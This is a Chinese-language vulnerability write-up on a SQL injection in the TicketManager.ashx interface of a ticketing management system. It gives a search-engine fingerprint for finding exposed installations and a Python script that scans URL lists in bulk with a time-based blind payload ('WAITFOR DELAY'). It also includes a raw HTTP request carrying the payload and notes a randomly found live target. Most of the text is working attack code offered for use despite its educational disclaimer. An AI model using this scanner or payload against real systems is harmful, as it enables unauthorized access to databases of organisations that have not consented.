声明：本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动，将与本文档的作者或发布者无关。

一、漏洞描述

某成科信票务管理系统以私有/公有云为基础部署，实现了基础六管控多协同的智慧票务系统。该系统提供了票类策略管控、售票流程管控、门票核验管控、营销渠道管控、数据分析管控以及财务核销管控等功能，并能与其他业务系统实现数据共享和协同作业。然而，其接口TicketManager.ashx存在SQL注入漏洞，攻击者可以利用此漏洞获取数据库敏感信息，甚至可能执行远程命令。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索：web.body=="images/login/img_distri.png"

2.使用poc批量扫描

import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re

# 禁用SSL证书验证，忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    """
    检查目标URL是否存在SQL注入漏洞
    :param url: 目标URL
    :return: 如果存在漏洞，返回True
    """
    url = url.rstrip("/")
    target = urljoin(url, "/SystemManager/Api/TicketManager.ashx")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # 构造SQL注入数据包
    data = "Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--"
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=25, data=data)
        # 判断响应状态码、响应内容以及响应时间是否符合预期
        if response.status_code == 200 and 'Table' in response.text and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered:{url}: zckxTicketManager_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本：python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包：

POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 61

Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:15'--

2.数据包分析 

1. 这是一个HTTP POST请求的数据包，包含了请求行、请求头和请求体。下面是对这个数据包的详细解释：

   1. 请求行：
      - 方法：POST
      - URI：/SystemManager/Api/TicketManager.ashx
      - HTTP版本：HTTP/1.1

   2. 请求头：
      - Host：x.x.x.x（目标服务器的IP地址或域名）
      - User-Agent：Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36（客户端浏览器信息）
      - Content-Type：application/x-www-form-urlencoded（请求体的数据类型）
      - Connection：close（表示请求完成后关闭连接）
      - Content-Length：61（请求体的长度，单位为字节）

   3. 请求体：
      - Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:15'--（包含两个参数，一个是Method，值为GetReServeOrder；另一个是solutionId，值为1' WAITFOR DELAY '0:0:15'--，这里使用了SQL注入攻击）

   这个数据包的目的是向目标服务器发送一个POST请求，请求路径为/SystemManager/Api/TicketManager.ashx，携带了两个参数。其中，solutionId参数的值包含了一个SQL注入攻击的代码片段，试图在服务器端执行WAITFOR DELAY命令，导致服务器延迟15秒才响应。

3.结束跑路

1.构造数据包，sleep(5)，延时5秒响应

2.构造数据包，sleep(3)，延时3秒响应​​​​​​​

每篇一言：欲买桂花同载酒，荒泷天下第一斗。